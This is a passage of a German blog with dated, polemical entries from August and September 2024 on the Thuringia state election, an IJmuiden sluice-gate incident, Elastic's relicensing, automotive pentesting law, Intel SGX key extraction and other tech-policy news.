Diese Menschen sind überhaupt nicht mehr zu erreichen auf Wegen, auf denen man psychosozial intakte Menschen erreichen könnte. Diese Menschen sind bereit, auch auf ihre eigene Zukunft und die ihrer Kinder und Enkel zu verzichten, solange sie andere damit schädigen können. Empathie kennen diese Menschen nicht, auch nicht im Umgang mit Geschäftspartnern, Kunden oder Patienten. Entprechend war auf den Wahlplakaten nichts progressives oder dem Gemeinwohl dienliches in Aussicht gestellt worden, sondern nur Entwürdigung, Entrechtung oder "Beseitigung" / Erklärung der Nichtexistenz anderer.
Deshalb erhebe ich auch keine Vorwürfe gegen bislang aktive Politiker, vor allem, wenn sie irgendwo noch etwas Anstand und Humanismus in sich trugen: die konnten diese Menschen nicht mehr erreichen, sie sind unerreichbar. Die sind hysterisch und im Wahn. Die bräuchten einen radikalen "Reset", eine radikale Rückführung auf den Boden menschlicher Realitäten - aber wer sollte das leisten können, und wie?
Ich habe durchaus Mitgefühl - mit den Menschen in Thüringen, die noch anständig sind und zu leben verstehen, ohne andere schädigen zu wollen: Die schickt man nun in die Hölle.
Nicht immer ist ein Wegzug schnell gemacht. Da hängen teils Jobs dran, teils sogar eigene Unternehmen. Ein Freund von mir ist noch in Thüringen mit seiner kleinen Hightech-Firma. Bin mal gespannt, was da passieren wird.
Da hängen familiäre Beziehungen dran, wird z.B. der Vater oder die Mutter vor Ort in deren Haus gepflegt und ein Wegzug kommt für die alten Leute ebenso wenig in Frage wie eine Unterbringung in einer Pflegeeinrichtung, da dort dann entsprechend u.U. wieder AfD-nahe Leute die Pflege bewerkstelligen und man seine Eltern dem nicht ausliefern will. Ja, auch Pflegedienste etc. können AfD-nah sein, wie jedes andere Unternehmen im Mittelstand auch.
Da sind teils die Kinder auf besonderen Schulen (Hochbegabtenschulen für musisch oder naturwissenschaftlich begabte Kinder), die will man da auch nicht ohne weiteres rausreißen (und verdrängt, dass unter einem entsprechenden Kultusministerium auch mit diesen Schulen ganz schnell Schluss sein kann).
Oder da ist es schlichtweg das Elternhaus, das man sich saniert hat, evtl. auch in Ignoranz der Situation ringsum, denn die ist ja nicht von heute auf morgen so übel geworden. Man hatte sich da teils jahrelang was vorgemacht und bereits weitgehend zurückgezogen gelebt, um sich gegenüber der Nachbarschaft nicht als "nicht zugehörig" zu erkennen zu geben. Die merken das aber trotzdem, denn wie soll man sich verhalten, wenn man am Gartenzaun mit faschistischer Hetze konfrontiert wird und Zustimmung als Normalität erwartet wird?
Da dürften sich aktuell so manche Zukunftshoffnungen pulverisieren und manche Immobilien ebenfalls.
Dass das alles konform mit dem Grundgesetz sein soll, lässt mich meine Haltung zu diesem Staat momentan auch nachjustieren. Wer diesen umfangreichen "Schutz" vor Faschismus genießt, braucht keine Feinde mehr.
Ich sehe aktuell wirklich keine "Lösung" im Sinne "Beseitigung des Faschismus". Ich erahne eher den Einstieg in eine Gewaltspirale, da sich auch unter neuer politischer Führung keine "Verbesserung" der Lage dieser Bevölkerungsgruppe einstellen dürfte.
Update: Hier kommt jetzt eine Menge Widerspruch rein, dass Hitlergruß zeigen nicht normal war, besonders nicht vor dem Mauerfall, weil man damit die Stasi provozieren konnte, die auf sowas schon geachtet hat. Aber die Beobachtung, dass besonders die, denen es überdurchschnittlich gut geht (auf Kosten ihrer ausgebeuteten Arbeiter vermutlich), eine besonders braune Gesinnung haben, die bestätigen bisher alle.

Wed Sep 4 2024

[l] Letztes Jahr wäre Amsterdam fast abgesoffen. Die Niederlande liegen ja bekanntlich zu einem beträchtlichen Teil unterhalb des Meeresspiegels, und es gibt da fette Fluttore, die das Nordseewasser draußen halten sollen.
Stellt sich raus: Die waren letztes Jahr versehentlich geöffnet, wenn sie geschlossen hätten sein sollen, und ein paar Milliarden Liter Nordseewasser fluteten auf Amsterdam zu.
Aufgefallen ist das einem Mitarbeiter der Wasserbehörde, der alle Schleusen auf dem Weg zugemacht hat und so Amsterdams Innenstadt gerettet hat.
At 3:52 a.m. on November 2, the control system of the sluice gates in IJmuiden switched to manual operation, and all seven gates were left fully open. The cause of this glitch is still unknown, but it nearly caused a disaster because, from that moment on, seawater flowed freely into the North Sea Canal toward Amsterdam.
Der Skandal hier ist nicht, dass die Tore offen waren, sondern dass sie einen Techniker hinschicken mussten, der das wieder umschaltete.
At the same time, a breakdown technician went to the sluice complex in IJmuiden. At 7:24 a.m., they managed to manually close the sluice gates in the IJmuiden lock.
Das ist ja mal heftig, finde ich. Eine Installation dieser Wichtigkeit und die betreiben die ... remote?!
Nicht nur das: Man kann remote auf manual schalten, wenn gar keiner vor Ort ist, der irgendwas manual machen konnte!?
Die Behörden haben jetzt die Fernbedienung abgeschafft und der Komplex wird jetzt von vor Ort betrieben. Außerdem ist 24/7 jemand vor Ort, der sehen kann, wenn was schiefläuft, indem er aus dem Fenster guckt.
Wo kommt eigentlich diese bekloppte Idee her, dass etwas billiger wird, wenn man den Kontrollkanal über das Internet schleift?! Völlig besoffen, genau wie bei den IoT-Sprallos auch. Das ist höchstens so lange billiger, bis deine Innenstadt absäuft.

Tue Sep 3 2024

[l] Noch ein Leserbrief zu Thüringen:
Ich wohne genau in jener ländlichen Gegend von der der Leserbriefschreiber spricht: zwischen Jena und Gera.
Und genau da beginnt der erste Teil des Problems: die Stadt Gera (klassische Arbeiterstadt), immerhin deutlich größer als Weimar, wird mal eben als vierte "Mittelstadt" komplett unterschlagen.
Wohl weil es dort nur gravierende soziale Probleme aber keine Uni, Hochschule, Kunstleuchttürme gibt? Zählen die da nicht mit als "Städter"?
Ja, richtig .. Gera hat AfD gewählt, nicht wie die anderen drei den Ramelow. Die Frage nach dem warum ist mit "sind halt Hillbillies" nur unzureichend beantwortet.
Gera hat enorme Probleme, insbesondere auch finanzielle, aber so richtig gekümmert hat man sich in Erfurt nie (auch schon vor Ramelow), so weit im Osten lässt sich selten ein Landespolitiker blicken.
Aber letztes Jahr haben sie eine neue Flüchtlingsunterkunft bekommen .. auf Anweisung des Landes.
Anderes Beispiel: die "echten" Landbewohner. Der Osten Thüringens ist relativ gut bewaldet, eine Region heißt sogar Holzland. Und ausgerechnet dort werden (nach massiven Protesten) gerade Wälder abgeholzt für Stromtrassen und Windräder weil irgendeine "Quote" zu erfüllen ist während 50 km weiter offene Ackerflächen vorherrschen an deren Rändern man das auch bauen könnte. Auch wenn ich selbst kein AfD Wähler bin (mich aber täglich mehrfach mit solchen Diskussionen herumschlagen muss) kann ich die Einstelllung durchaus verstehen, dass sich die Leute dort nicht mehr wahrgenommen fühlen nach dem Motto "wir opfern unseren Wald" für den Ökostrom der grünen Städter.
Es ist aus meiner subjektiven Wahrnehmung durchaus zutreffend. Die Thüringer Landespolitik hat schon immer nach dem Leuchtturm-Prinzip gehandelt und in ihre "Leuchttürme" (Jena-Wissenschaft, Erfurt-Verwaltung, Weimar-Kultur) gefördert, das Umland aber fast garnicht. Nur leider haben die Leuchttürme zu wenig Strahlkraft als dass das Umland etwas von ihnen hätte, ausser steigenden Mieten weil die Städter in Randgebiete ziehen.
Ich halte dies übrigens nicht für ein spezielles Problem nur in Thüringen sondern generell im Land. Immer mehr Menschen haben das Gefühl dass die (regierende) Politik sich um andere kümmert aber nicht um sie.
Und sie haben damit noch nichtmal Unrecht.
Update: Ein anderer Leser ergänzt:
Dein Leser hat einen validen Punkt angesprochen.
Dann stell mal die Aufgabe an die Leserschaft, ob sie heraus bekommen, warum man die Stromtrassen nicht entlang der Bundesautobahnen verlegen kann. In dem Fall entlang der A9.
Zusatzaufgabe: Wer blockiert welchen Schritt und wer wird für die Folgen verantwortlich gemacht?
Also bei der ominösen Fragestellung kann es ja eigentlich nur die CDU sein, oder?

Mon Sep 2 2024

[l] Leserbrief zur Lage in Thüringen:
ganz so einfach ist das dann doch nicht. Schaue Dir mal an, wo die AfD *nicht* gewählt worden ist und der Ramelow seinen Rückhalt und Respekt zurecht immer noch genießen darf. Wenn man bedenkt, dass Thüringen eigentlich nur drei 'große' Städte hat - und die sind ja eigentlich auch eher auf Klein- bis Mittelstadtniveau, ist das also ziemlich beeindruckend: die AfD ist besonders stark, wo es quasi keine 'Ausländer' gibt und die ganzen Idioten hängen geblieben sind. Daher auch die Betroffenheit in Weimar, Erfurt und Jena. Man sieht sich hier recht hilflos von den Dorftrotteln ans Messer geliefert.
Seit Jahren demonstrieren hier in Weimar Montag Abend immer die Faschos aus Greiz und Co. und ich habe mich immer gefragt, was die hier eigentlich wollen. Jetzt weiß ich es. Das war der Fuckfinger an die Städte in Thüringen nach dem Motto: fühlt Ihr Euch hier nur sicher in Euer Blase mit Papa Ramelow, die Wahlen werden aber im Vogtland, im Eichsfeld und in Nordhausen entschieden. Sie hatten Recht. Als Ramelow hier auf der letzten Demo ein leidenschaftliches Plädoyer gegen Rechtsextremismus gehalten hat, hat er gemacht, worüber Du Dich in Deinem Blog immer mal wieder ärgerst, wenn sich diejenigen zurückmelden, für die die Nachricht eigentlich keine Neuigkeit mehr ist: er hat die falschen adressiert, die die ohnehin von ihm beeindruckt waren.
Egal in welchem Gremium er sich über was auch immer hat informieren lassen, hat er stets gefragt, was er und die Politik jetzt noch machen können, um einen besseren Rahmen für die Spezialisten zu schaffen. Aber mit den Dorfidioten zu sprechen, ist ihm nicht gelungen, was ich ehrlich gesagt sehr gut verstehen kann.
Hier hat vor einem Jahr ungefähr schon eine Art Exodus begonnen: am Nationaltheater gibt es die Abwanderung (mit der Mutter einiger meiner Kinder gingen noch 3 Kolleginnen in den Westen (zurück)) genauso wie an der Musikhochschule (ein ganzer Bereich (alte Musik) ist komplett weg, die Komposition seither nur noch kommissarisch besetzt), am Bauhaus oder sogar am Hochbegabtenmusikgymnasium Belvedere. Die bekommen nicht nur ihre Schülerzahlen jetzt nicht mehr hin, trotz der vielleicht 20% Ukrainer: jetzt gehen auch die Lehrer und Mitarbeiter. Meine älteste Tochter hat gerade am renommiertesten Gymnasium Abi gemacht und bis auf 3 Hansels wollen alle weg oder sind es jetzt. In der Stufe haben übrigens fast alle links gewählt.
Als wir im letzten Jahr beim Landesmusikwettbewerb in Greiz waren, hat man die Beiträge unterbrechen müssen, weil an der Vogtlandhalle so viele national beflaggte und düster trommelschlagende und trillerpfeifende Faschos immer wieder vorbeigezogen sind, dass die Kammermusikbeiträge der Kinder und Jugendlichen unsicher wurden. Also keine Sorgen machen ist hier vor Ort gar nicht so einfach. Da schwebt immer solch eine Art Gewaltbereitschaft mit, dass Kinder schon mal anfangen zu weinen.
Ich habe noch mehr Mails von Leuten gekriegt, die jetzt halt da wegziehen. Einer schrieb, er sei auch zu alt, um sich auf dem Arbeitsweg mit Nazis prügeln zu müssen.

Fri Aug 30 2024

[l] Die IT-Welt ist ja voll mit super-peinlichen Pressemitteilungen, aber diese hier setzt Maßstäbe. Elastic stellt ihre Software unter AGPL.
Das lädt ja diverse gehässige Kommentare geradezu ein, und sie bringen selber ein paar:
“Changing the license was a mistake, and Elastic now backtracks from it”. We removed a lot of market confusion when we changed our license 3 years ago.
Ja genau! Confusion wie "kann ich dieser Firma trauen?" und "Sollte ich mich von deren Produkten abhängig machen?"
“Elastic changes the license because they are not doing well” - I will start by saying that I am as excited today as ever about the future of Elastic.
*fremdschäm*
[D.N.A] Elasticsearch and Kibana can be called Open Source again. It is hard to express how happy this statement makes me.
Als ob das eine Naturkatastrophe war, und man hat jetzt die Straßen wieder repariert! Nein, Elastic, IHR habt das gemacht.

Tue Aug 27 2024

[l] Das Lobbyregister des Bundestags hat ein Positionspapier der Automobilindustrie. Die sind mit den Cybersecurity-Auflagen und der Gesetzeslage unzufrieden.
Fahrzeughersteller sind heute verpflichtet, durch Penetrationstests Sicherheitslücken ihrer Produkte zu identifizieren und zu beseitigen. Sowohl für mit der Durchführung solcher Tests beauftragte Spezialisten als auch für unabhängig agierende, ethische Sicherheitsforscher besteht dabei nach heutiger Gesetzeslage jedoch die Gefahr, sich strafbar zu machen.
Ach. Ach was! Sag bloß. Hätte doch nur damals jemand den Bundestag gewarnt, bevor sie dieses Schrottgesetz erlassen!1!! Ihr wisst schon, so ein CCC-naher Blogger mit Security-Background am besten!
Aber das soll hier bitte nicht so klingen, als sei die Automobilindustrie im Recht. Absolut nicht. Die machen sich mit dem Positionspapier nackig.
Konkret sagen sie nämlich, dass sie vor allem Sorgen um White-Hat-Hacker haben, die für sie kostenlos freiwillig unbezahlt ohne Entlohnung auf eigene Rechnung in ihrer eigenen Freizeit ihre Produkte auf Sicherheitslücken absuchen -- und die dann aber nicht veröffentlichen sondern schön demur und devot dem Hersteller melden, damit der da solange drauf sitzen kann wie er will. Das ist nämlich viel billiger als wenn man ein paar Profis einstellt. Und hey, man kann auch Spendierhosen anhaben und ein paar Brotkrumen Bug Bounty ausschütten, das ist immer noch eine Größenordnung billiger.
Warum ist das so viel billiger? Weil das kein Prozess ist. Ein regulärer Security-Prozess hat das Ziel, die Security zu verbessern, und danach sagen zu können, wieviel Abdeckung sie hatten, wie schlimm alles ist, und wieviel besser es wird, wenn man die Bugs hier jetzt fixt.
Die Automobilindustrie hat keinen Bock, tatsächlich Security zu machen. Sie würden viel lieber einfach Mails von Leuten kriegen, die ihnen Bugs in ihrer Software schenken, wo sie anderswo Geld für in die Hand nehmen müssten. Und dann dem Gesetzgeber und dem Regulator ins Gesicht zu lügen, man habe ja Security gemacht jetzt.
Nota bene: Bei Bug Bounty trägt der Bugsucher das Risiko, seine Zeit zu verschwenden, ohne etwas gefunden zu haben, und er hat quasi per Definition nicht den Quellcode und keine Architekturdokumentation. Der wird also im Allgemeinen eher oberflächlich und automatisiert suchen, und vielleicht ein paar Tage manuell hier und da mal hinfassen, ob es bröselt beim Anfassen.
Wenn IRGENDWO IRGENDEIN Bug Bounty Typ etwas finden kann, ist das kein Zeichen dafür, dass Security besser wurde, sondern dass der Ist-Zustand wirklich abgrundtief schlecht ist.
Wird noch schlimmer. Die Automobilindustrie möchte auch nur Tests an Autos legalisieren. Autos, die der Kunde gekauft hat. Die sein Eigentum sind. Die wollen nicht legalisieren, dass Leute ihre Backendsystem schief angucken. Ja, so beschissen ist bei uns die Gesetzeslage, dass man sich Sorgen machen muss, wenn man sein eigenes Eigentum untersucht.
Wieso überhaupt das Positionspapier? Es ist m.W. noch kein Bug-Bounty-Aktivist wegen Hackerparagraph verfolgt worden. Das kann ich nur so interpretieren, dass die Autoindustrie enttäuscht ist, wie schlecht die Ausbeute von den Bug-Bounty-Programmen ist. ACH. ACH WAS. Die Leute wollen gar nicht auf eigenes Risiko erst ein Auto kaufen müssen, um es dann zu untersuchen, und auf der Reparatur sitzenzubleiben, wenn sie es versehentlich bricken? Also DAMIT konnte ja wohl NIEMAND rechnen!
Aber aber aber wir sind doch FDP-Wähler hier und hatten gedacht, dass der Markt das regelt!1!! Ja, liebe Automafia. Der Markt wird das regeln. Indem ihr untergeht.
Ein bemerkenswertes Detail gibt es noch. Sie sehen sich nämlich außerstande, selber richtige Audits durchzuführen, weil sie dafür (so behaupten sie jedenfalls) die Einwilligung ihrer ganzen Lieferkette einholen müssten. Und äh nee, dann machen wir lieber Bug Bounty!1!!
Ich bin da vielleicht ein bisschen naiv, aber wieso muss eigentlich Mercedes ihre Zulieferer um Erlaubnis fragen, die von ihnen gekauften Komponenten prüfen zu lassen? Das könnte man doch mal gesetzlich noch deutlicher klarstellen, dass das nicht so ist.
Wieso kann VW nicht einfach in ihrer Zuliefererverträge reinschreiben, dass sie Audits machen wollen? Wenn der Zulieferer das nicht will, kann er geordnet pleite gehen. Das ist ja nicht VWs Anforderung sondern gesetzliche Anforderung an VW! Dass die überhaupt VW damit durchkommen ließen (offenbar!), einfach zu behaupten, sie könnten keine richtigen Audits machen, weil die Zulieferer zu befragen unzumutbar wäre und die würden eh nein sagen!!!
Oh und einen noch, der mich immer besonders ärgert. Die tun da die ganze Zeit so, als seien Pentests ein Mittel zur Steigerung der Security. Sind sie nicht. Pentests sind ein Mittel zum Ausfüllen von sinnlosen Compliance-Checkboxlisten. Pentests bringen gar nichts, ja sogar weniger als gar nichts, weil du danach nicht weißt, wieviel Prozent der Angriffsoberfläche die überhaupt identifiziert und bearbeitet haben. Da werden in der Praxis irgendwelche off-the-shelf Nessus-Forks laufen gelassen und dann geht man ins frühe Wochenende. Da könnte ich endlos drüber kotzen.
Besonders krass ist, wenn du solche Leute dann heulen hörst, dass Nessus so viele false positives hat. NA DANN MACHT HALT EINEN ORDENTLICHEN AUDIT UND KEINEN NESSUS-BULLSHIT!
Mit einer Sache haben sie allerdings Recht.
Während Hersteller und Sicherheitsforscher aus (berechtigter) Sorge vor Strafverfolgung von Penetrationstests absehen müssen und Sicherheitslücken deshalb unentdeckt und unbehandelt bleiben, haben Black Hat Hacker bei der Entdeckung und schädigenden Nutzung von Sicherheitslücken umso leichteres Spiel.
Das habe ich damals dem zuständigen Bundestagsausschuss ins Gesicht angekündigt, und so ist es auch gekommen. Jetzt ist es ein bisschen spät. Jetzt gibt es in diesem Lande fast nur noch Compliance-Securitytheater. Pentests. Automatisierte Scans. Am besten in der Cloud. ISO 27003. Aus meiner Sicht alles wertloses Theater.
Am liebsten hätte die Automobilindustrie, dass es immer schön regnet, aber niemand nass wird. Security frühstücken wir über Bug-Bounty-Theater ab. An unsere Backends lassen wir niemanden ran, und wenn doch jemand guckt, zeigen wir ihn mit dem Hackerparagraphen an, sprechen von krimineller Energie und gezieltem Angriff, und bezahlen Crowdstrike (ja, DAS Crowdstrike!) dafür, das als APT zu "identifizieren" und den Russen in die Schuhe zu schieben.
[l] Leserbrief:
aus eigener Erfahrung (grade live erlebt): die Arztpraxis im Nachbardorf *erweitert* massiv die Sprechzeiten. Fast Faktor zwei!
Das ist doch mal ne gute Nachricht? Mehr Arzt auf dem Land?
Fast.
Grund ist die Schliessung der Zweit-Praxis "draussen" auf den Dörfern.
Nicht wegen Personalmangel. Nein.
Wegen der Datenanbindung.
Mit Einführung des E-Rezepts war die Praxis nicht mehr betreibbar. Laufend Verbindungsabbrüche mit teilweise 10min Resync (Sicherheit, wissense ja), verlorengegangene E-Rezepte, Support-Anrufe teilweise im Viertelstundentakt.
Ergo: grade ältere Mitbürger, die nicht mobil sind, müssen jetzt 20km fahren, weil es die fucking Telekom nicht hinkriegt, eine Praxis über DSL auf dem Land anzubinden.
Und ich vermute mal, dass E-Rezepte weniger Bandbreite brauchen als Video bei Amazon Prime.
Ja, warum eigentlich nicht dann so einen Router mit SIM-Karte?
Antwort der Ärztin: "wenn ich auf Hausbesuch bin, bin ich abgetaucht für die Praxis, nicht erreichbar. Ich rufe teilweise vom Festnetz der Patienten in der Praxis an und frage, ob akut was ansteht...."
Für die Stammpraxis läuft es (noch) - bis es an die erweiterten digitalen Sachen geht (Elektronische Patienten Akte). Da steht schon im Raum: wenn die kommt, und keine Glasfaser da ist, wird dichtgemacht.
Datenpunkt hierzu: Glasfaser wurde 2022 massivst beworben per Telekom, 2023 sollte sie da sein... aktueller Termin (aber *nur* mit Buchung eines Glasfaser-Tarifs) Mitte 2025. Also... falls alles gut geht. Und Putin nicht noch mehr Glasfaserwerke in der Ukraine bombardiert (Aussage Telekom Support).
Ja, meine Damen und Herren. Richtig gelesen.
Die Telekom gefährdet in Deutschland mehr Menschenleben als der Islamische Staat.

Mon Aug 26 2024

[l] Verwendet hier jemand Intel SGX?
Das ist ja schon länger zombifiziert und es gibt überhaupt nur noch zwei Anwender: Signal und Crypto-Bros, die damit irgendwelche Flim-Flam-Hexerei veranstalten, damit sie dir ins Gesicht lügen können, ihr Code laufe in einer gesicherten Umgebung ab und sei nicht manipuliert.
Die sichere Umgebung musst du ihnen halt glauben, aber woran erkennst du, dass das nicht manipuliert ist? Nun, Intel hat da einen Mechanismus, der eine digitale Signatur von dem Code in der Enklave macht, zu einem voll super vertrauenswürdigen Intel-Cloud-Service hochlädt, und dem musst du halt trauen. Weil ist ja Intel. Wem kann man denn bitte trauen wenn nicht Intel?!
Die Signatur wird mit einem privaten Schlüssel gemacht, der nur in der Enklave ist, und der über Fuses provisioniert wird auf dem Chip, wo dann die Bits durchgebrannt werden, die 0 sein sollen in dem Key. Und den kann ja niemals nie nicht jemand extrahieren, weil das ist ja Hardware und so.
Nun … hier hat jemand den Key extrahiert. *hutlüpf* (Danke, Justin)

Thu Aug 22 2024

[l] Die CDU will Bahnhöfe mit "KI" überwachen (Achtung: Link geht zur "Bild"). Auf die Null-Performance der CDU ist echt Verlass.
Jahrelang habe ich mir Sorgen gemacht, dass da eines Tages jemand aus den Reihen aufsteigen wird bei denen, der kein völliger Depp ist. Das war gänzlich unbegründet.
Ines Claus (44), CDU-Fraktionschef im Hessischen Landtag und Mitglied des CDU-Präsidiums, will auf Künstliche Intelligenz setzen – in Verbindung mit Kamera-Systemen. Sie sagt zu BILD: „Durch den Einsatz von Gesichtserkennung und KI können wir 99 Prozent vor dem 1 Prozent Straftätern schützen! Wenn wir es richtig benutzen, könnte die KI in Zukunft auch beispielsweise Waffen erkennen und uns die 1 1/2 Minuten Vorsprung bringen, die Leben retten.“
Spätestens bei "könnte … in Zukunft" ist klar, dass sie selber weiß, dass "KI" das nicht kann.
Das ist, was die SPD von der CDU unterscheidet. Beide sind krachend inkompetent, aber die CDU ist auch noch böswillig und lügt dir mit Vorsatz ins Gesicht.
Die SPD hat nicht genug Sachverstand, dass man von Vorsatz und damit Lüge reden kann. Die glauben das wirklich, was sie dir dreist ins Gesicht lügen.

Tue Aug 20 2024

[l] Mit zunehmender Solarzellendichte auf deutschen Dächern stellen sich langsam Fragen wie: Ist das Management davon vielleicht in der Cloud? Könnte ein böser Hacker das hacken und mal eben ein paar Megawatt verschwinden lassen oder neu dazuschalten, vielleicht in kurzer Abfolge, um das Netz zu destabilisieren?
Solche Szenarien sind bereits diskutiert worden, nicht zuletzt weil es solche Vorfälle bereits gab.
Der immer wieder lesenswerte Bert Hubert hat sich dazu mal ein paar Gedanken gemacht. Hier sein Anreißer:
The short version: most consumer and business solar panels are centrally managed by a handful of companies, mostly from countries outside of Europe. In the Netherlands alone, these solar panels generate a power output equivalent to at least 25 medium sized nuclear power plants. There are almost no rules or laws in Europe governing these central administrators. We pretend that these companies only deserve the regulation we’d apply to (say) an online birthday calendar.
Es ist ja an sich eine gute Idee, möglichst bürokratiefrei den privaten Ausbau von Solaranlagen zu fördern, aber wenn die Steuerung davon zentralisiert von irgendwelchen Firmen gemacht wird, sollte es für die schon regulatorische Vorschriften und Aufsicht geben, meint ihr nicht?
Oder wir könnten einfach mal die Frage stellen, wieso das Management von Solaranlagen nicht direkt per Ethernet oder von mir aus Bluetooth innerhalb des Hauses geht, sondern über eine verfickte Schrott-Cloud von irgendwelchen Billigstanbietern gehen muss, denen es scheißegal ist, ob dein Haus abbrennt.
Das ist generell ein Problem bei IoT.
Update: Immer dran denken: Das S in IoT steht für Security!

Wed Aug 14 2024

[l] Nur Nixon konnte nach China gehen.
Nur die Grünen konnten den ersten Angriffskrieg Nachkriegsdeutschlands führen.
Nur die SPD konnte den Sozialstaat zerstören.
Nur eine SPD-Innenministerin kann dem BKA die Befugnis geben, heimlich Wohnungen zu durchsuchen. Man stelle sich mal vor, wenn die CDU das versucht hätte! Was die SPD da für einen Terz gemacht hätte!
Hey sag mal, was nicht auch die FDP in dieser Koalition? Was sagen die denn dazu? Oder sind die gerade abgelenkt mit ihren Auto-Innenstadt-Plänen?
Der Entwurf zur Reform des BKA-Gesetzes umfasse daher "die Befugnis zum verdeckten Betreten von Wohnungen als Begleitmaßnahme für die Online-Durchsuchung und Quellen-Telekommunikationsüberwachung", also das Anbringen von Spähsoftware auf Desktops oder Smartphones, sowie die Befugnis "zur verdeckten Durchsuchung von Wohnungen".
Hattrick! Trifecta! Aber sorgt euch nicht:
Diese Instrumente sollten jedoch nur unter sehr hohen Hürden als letztes Mittel und allein zur Terrorismusbekämpfung eingesetzt werden können
Oh ja natürlich! Nur unter ScHWeRStEN HürDEn!1!!
Missbrauch ist nahezu ausgeschlossen!1!! Wie? Nein, nicht weil er nicht vorkommt, sondern weil das Opfer ihn nicht bemerkt.
Ich schlug vor einer Weile vor, Politiker aus dem Verkehr zu ziehen, die verfassungsbrechende Gesetze vorantreiben. Das hier war die Art von Fall, die ich da vor Augen hatte.
Sehr schön auch die Kategorie bei der Tagesschau. "Innere Sicherheit". Von Innerer Sicherheit kann ja wohl keine Rede sein, wenn irgendjemand verdeckt deine Wohnung durchsuchen und Malware auf deine Geräte aufbringen darf!

Tue Aug 13 2024

[l] Die Python-Community zerlegt sich gerade selbst. Mit einer Vehemenz und Nachhaltigkeit, die ich atemberaubend finde.
Die Hexenverbrennung hat einen Core Developer suspendiert, weil er gegen den Code of Conduct verstoßen hat. Was meint ihr, tippt mal. Welches Verbrechen könnte so groß sein, dass du einen Core Developer suspendierst?
Jemanden vergewaltigt? Kinderpornos auf dem Rechner gehabt vielleicht?
Naja nee, da würde ich nicht drüber bloggen. Weniger also. Vielleicht jemanden beleidigt? Gestalked? Deadnaming?
Ich zitiere mal die Vorwürfe.
- Making a significant number of posts (47 out of 177) to a discussion of a change to bylaws, "which created an atmosphere of fear, uncertainty, and doubt, which encouraged increasingly emotional responses from other community members."
- "Defending 'reverse racism' and 'reverse sexism', concepts not backed by empirical evidence, which could be seen as deliberate intimidation or creating an exclusionary environment."
- "Using potentially offensive language or slurs, in one case even calling an SNL [Saturday Night Live] skit from the 1970s using the same slur 'genuinely funny', which shows a lack of empathy towards other community members." (More context on that here.)
- "Making light of sensitive topics like workplace sexual harassment, which could be interpreted as harassment or creating an unwelcoming environment."
- "Casually mentioning scenarios involving sexual abuse, which may be inappropriate or triggering for some audiences."
- "Discussing bans or removals of community members, which may be seen as publishing private information without permission."
- "Dismissing unacceptable behavior of others as a 'neurodivergent' trait, which is problematic because it creates a stereotype that neurodivergent people are hard to interact with and need special treatment.
- "Excessive discussion of controversial topics or past conflicts, which could be seen as sustained disruption of community discussions."
- "Use of potentially offensive terms, even when self-censored or alluded to indirectly."
- "Making assumptions or speculations about other community members’ motivations and/or mental health."
Nein. Er hat niemanden beleidigt, gestalked, ungefragt angefasst oder angebaggert. Er hat kein Deadnaming gemacht. Er hat niemandem irgendwelche Rechte abgesprochen. Er wollte auch niemanden rausschmeißen. Hat sich nicht mal gegen marginalisierte Minderheiten geäußert.
Er fand etwas lustig.
Ich finde ja die Aussage, dass "reverse racism" und "reverse sexism" "not backed by empirical evidence" sei, aus dem Mund dieser Leute die absolute Krönung.
Die verlangen die ganze Zeit vom Rest der Gesellschaft, dass sie ihnen ihre Marginalisierung zu glauben haben, dass man immer dem Opfer glauben muss, auch wenn es keine Beweise vorlegen kann, etc pp. Aber wenn das jemand anderes macht, dann sagen sie "not backed by empirical evidence"? Genau mein Humor!
Tja. Und so gewinnen am Ende doch wieder die "KI"-Bros gegen die Open Source-Leute. Die Open-Source-Forschung mit "KI" besteht praktisch ausschließlich aus Python-Rotz. Ein Schelm, wer Böses dabei denkt.

Mon Aug 12 2024

[l] Ich hatte hier von meinem Monitor-Ärger erzählt. Nach dem Netzteiltausch ist das HDMI-Problem noch da und nervt gewaltig.
Ein Leser schlug vor, ein USB-C nach Displayport-Kabel zu kaufen und es damit zu probieren.
Habe ich gemacht, und: Fuck me, wie Tag und Nacht!
Ich hatte den Monitor vorher jahrelang mit Displayport an meinem alten Desktop im Einsatz und nie Stress mit Powersave. Im Moment betreibe ich ihn an einem Gaming-Laptop, der hat halt nur HDMI und USB-C.
Das ist kein Gebiet, auf dem ich Ahnung habe, daher nahm ich an, das sei alles elektrisch identisch oder zumindest dasselbe Protokoll, und wenn HDMI zickt, dann wird das daran liegen, dass der Monitor die Grafikkarte nicht mag.
Nix da. War das HDMI. Mit Displayport ist der olle Monitor wieder ein Traum. Ich habe mir ein 8k-fähiges Kabel geklickt, denn wenn das nicht geholfen hätte, hätte ich mir einen neuen Monitor gekauft, und von dem hätte ich dann 120hz haben wollen bei 4k, oder wenigstens HDR.
Wenn ihr also zickende Hardware bei HDMI habt, probiert auch mal den Umstieg auf Displayport.
Erst zickte das ein bisschen rum, ein paar Minuten lang hat der Rechner immer einen Monitor gesehen, dann 4k bei 60hz drauf gespielt, dann ging der Sync verloren, dann war er wieder da und das Spiel ging von vorne los. Ich fing schon an, echt schlechte Laune zu kriegen, aber dann hat sich das "von alleine" erholt. Keine Ahnung, wieso das jetzt geht, aber es geht, und ich fasse das nicht wieder an jetzt :-)
Auf der einen Seite super, weil ich jetzt viel besser arbeiten kann. Auf der anderen Seite scheiße, weil meine Ausrede für die Anschaffung eines neuen Monitors weg ist. MOAN EY

Sun Aug 11 2024

[l] Hacker hacken ... Trumps Wahlkampf-Organisation.
Gibt ein paar lustige Details. Erstens: Trump sitzt so tief in Putins Arsch, dass sie nicht "DIE RUSSEN!!1!" gerufen haben sondern "DER IRAN!!1!" :-)
Zweitens: Aber natürlich sind die in die Cloud gezogen und dort gehackt worden!
The campaign blamed “foreign sources hostile to the United States,” citing a Microsoft report on Friday that Iranian hackers “sent a spear phishing email in June to a high-ranking official on a presidential campaign.” Microsoft did not identify the campaign targeted by the email and declined to comment Saturday.
Ist ja komisch! Ihr habt euch komplett abhängig gemacht von gammeliger Microsoft-Cloud-Scheiße und jetzt wurden ihr gehackt? NA SOWAS! Hätte euch doch nur vorher jemand gewarnt!
Wisst ihr, bei manchen Leuten bin ich ja ganz froh, dass die nicht auf mich hören.
Ich persönlich würde ja bestreiten, dass die Hacker "hostile to the United States" sind. Das sind Freunde in der Not!1!!

Fri Aug 9 2024

[l] Nach langem Winterurlaub ist Captain Obvious mit ein paar Meldungen zurück.
1. Sicherheitsforscher verwandeln Sonos-One-Lautsprecher in Wanze.
  Nein, tun sie nicht. Das war vorher schon eine Wanze, und ist es auch nachher noch.
  Woran man das erkennt? Daran dass ein Mikrofon eingebaut ist. Duh.
